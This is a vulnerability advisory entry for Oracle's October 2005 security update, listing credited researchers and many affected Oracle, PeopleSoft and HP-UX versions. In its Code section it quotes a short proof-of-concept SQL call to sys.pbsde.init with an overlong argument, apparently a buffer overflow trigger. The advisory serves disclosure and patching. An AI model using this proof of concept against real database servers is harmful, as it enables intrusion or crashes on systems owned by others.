exploits , vulnerabilities , articles , Oracle October Security Update Multiple Vulnerabilities
| Title |
Oracle October Security Update Multiple Vulnerabilities |
| Published |
2005-10-18-12:00AM |
| Updated |
2005-11-08-05:53PM |
| Class |
Unknown |
| CVE |
CAN-2005-0873 |
| Remote |
Yes |
| Local |
Yes |
| Credit |
The following people are credited for the discovery of vulnerabilities listed in the Critical Patch Update:
Brian Carr; Sacha Faust of S.P.I. Dynamics, Inc.; Esteban Mart?nez Fay? of Application Security, Inc.; Alexander Kornbrust of Red Database Security |
| Vulnerable |
PeopleSoft PeopleTools 8.46.3
PeopleSoft PeopleTools 8.45.5
PeopleSoft PeopleTools 8.43
PeopleSoft PeopleTools 8.42
PeopleSoft PeopleTools 8.41
PeopleSoft PeopleTools 8.40
PeopleSoft PeopleTools 8.20.7
PeopleSoft PeopleTools 8.20
PeopleSoft PeopleTools 8.19
PeopleSoft PeopleTools 8.19
PeopleSoft PeopleTools 8.18
PeopleSoft PeopleTools 8.17
PeopleSoft PeopleTools 8.16
PeopleSoft PeopleTools 8.15
PeopleSoft PeopleTools 8.14
PeopleSoft PeopleTools 8.13
PeopleSoft PeopleTools 8.12
PeopleSoft PeopleTools 8.11
PeopleSoft PeopleTools 8.10
PeopleSoft CRM 8.9
PeopleSoft CRM 8.8.1
Oracle Workflow 11.5.9 .5
Oracle Workflow 11.5.1
Oracle Oracle9i Standard Edition 9.2 .0.6
Oracle Oracle9i Standard Edition 9.2 .0.5
Oracle Oracle9i Standard Edition 9.0.1 .5 FIPS
Oracle Oracle9i Standard Edition 9.0.1 .5
Oracle Oracle9i Standard Edition 9.0.1 .4
Oracle Oracle9i Personal Edition 9.2 .0.6
Oracle Oracle9i Personal Edition 9.2 .0.5
Oracle Oracle9i Personal Edition 9.0.1 .5 FIPS
Oracle Oracle9i Personal Edition 9.0.1 .5
Oracle Oracle9i Personal Edition 9.0.1 .4
Oracle Oracle9i Enterprise Edition 9.2 .0.6
Oracle Oracle9i Enterprise Edition 9.2 .0.5
Oracle Oracle9i Enterprise Edition 9.0.1 .5 FIPS
Oracle Oracle9i Enterprise Edition 9.0.1 .5
Oracle Oracle9i Enterprise Edition 9.0.1 .4
Oracle Oracle9i Application Server Web Cache 9.0.3 .1
Oracle Oracle9i Application Server Web Cache 9.0.2 .3
Oracle Oracle9i Application Server 9.2 .0.7
Oracle Oracle9i Application Server 9.2 .0.6
Oracle Oracle9i Application Server 9.0.3 .1
Oracle Oracle9i Application Server 9.0.2 .3
Oracle Oracle8i Standard Edition 8.1.7 .4
Oracle Oracle8i Standard Edition 8.1.7 .4
Oracle Oracle8i Standard Edition 8.0.6 .3
Oracle Oracle8i Standard Edition 8.0.6
Oracle Oracle8i Enterprise Edition 8.1.7 .4
Oracle Oracle8 8.0.6 .3
Oracle Oracle8 8.0.6
Oracle Oracle10g Standard Edition 10.1 .0.4.2
Oracle Oracle10g Standard Edition 10.1 .0.4
Oracle Oracle10g Standard Edition 10.1 .0.3.1
Oracle Oracle10g Standard Edition 10.1 .0.3
Oracle Oracle10g Standard Edition 10.1 .0.2
Oracle Oracle10g Personal Edition 10.1 .0.4
Oracle Oracle10g Personal Edition 10.1 .0.3.1
Oracle Oracle10g Personal Edition 10.1 .0.3
Oracle Oracle10g Personal Edition 10.1 .0.2
Oracle Oracle10g Enterprise Edition 10.1 .0.4
Oracle Oracle10g Enterprise Edition 10.1 .0.3.1
Oracle Oracle10g Enterprise Edition 10.1 .0.3
Oracle Oracle10g Enterprise Edition 10.1 .0.2
Oracle Oracle10g Application Server 10.1.2
Oracle Oracle10g Application Server 10.1 .0.4
Oracle Oracle10g Application Server 10.1 .0.3.1
Oracle Oracle10g Application Server 10.1 .0.3
Oracle Oracle10g Application Server 10.1 .0.2
Oracle Oracle 9i Application Server Release 1 1.0.2 .2
Oracle JD Edwards EnterpriseOne 8.95 _B1
Oracle JD Edwards EnterpriseOne 8.94 _Q1
Oracle JD Edwards EnterpriseOne SP23_K1
Oracle Enterprise Manager Grid Control 10g 10.1 .0.4
Oracle Enterprise Manager Grid Control 10g 10.1 .0.3
Oracle Enterprise Manager Database Control 10g 10.1 .0.4
Oracle Enterprise Manager Database Control 10g 10.1 .0.3
Oracle Enterprise Manager Application Server Control 9.0.4 .2
Oracle Enterprise Manager Application Server Control 9.0.4 .1
Oracle Enterprise Manager 9.0.4 .1
Oracle EBusiness Suite 11i 11.5.9
Oracle EBusiness Suite 11i 11.5.8
Oracle EBusiness Suite 11i 11.5.7
Oracle EBusiness Suite 11i 11.5.6
Oracle EBusiness Suite 11i 11.5.5
Oracle EBusiness Suite 11i 11.5.4
Oracle EBusiness Suite 11i 11.5.3
Oracle EBusiness Suite 11i 11.5.2
Oracle EBusiness Suite 11i 11.5.1
Oracle EBusiness Suite 11i 11.5 .10
Oracle EBusiness Suite 11i 11.5
Oracle EBusiness Suite 11.0
Oracle Developer Suite 10.1.2
Oracle Developer Suite 9.0.4 .2
Oracle Developer Suite 9.0.4 .1
Oracle Developer Suite 9.0.2 .1
Oracle Collaboration Suite Release 2 9.0.4 .2
Oracle Collaboration Suite Release 1 10.1.1
Oracle Collaboration Suite Release 1
Oracle Clinical 4.5.1
Oracle Clinical 4.5
Oracle Application Server Release 2 10.1.2 .0.2
Oracle Application Server Release 2 10.1.2 .0.1
Oracle Application Server Release 2 10.1.2 .0.0
Oracle Application Server Release 2 9.0.2 .3
Oracle Application Server Release 2 9.0.2 .1
Oracle Application Server 10g 9.0.4 .2
Oracle Application Server 10g 9.0.4 .1
Oracle Application Server 10g 9.0.4
HP HPUX 11.23
HP HPUX 11.11
HP HPUX B.11.23
HP HPUX B.11.11
HP HPUX B.11.11 |
| Not Vulnerable |
|
| Code |
An exploit would not be required for some of these issues such as the SQL injection vulnerabilities. Other issues would likely require exploit code.
The following proof of concept code provided by <oracle_secalert@hushmail.com> is available for DB27:
SQL> exec
sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL);
BEGIN
sys.pbsde.init('AA',TRUE,'MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_A
NN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MA
RY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSO
N_MARY_ANN_DAVIDSON_MARY_ANN_DAVIDSON',NULL); END;
---
Currently we are not aware of any exploits for this issue. If you feel we are in error or are aware of more recent information, please mail us at: content@securitydot.net <mailto:content@securitydot.net>.
|
| TXT |
 |
|
Advertising
|
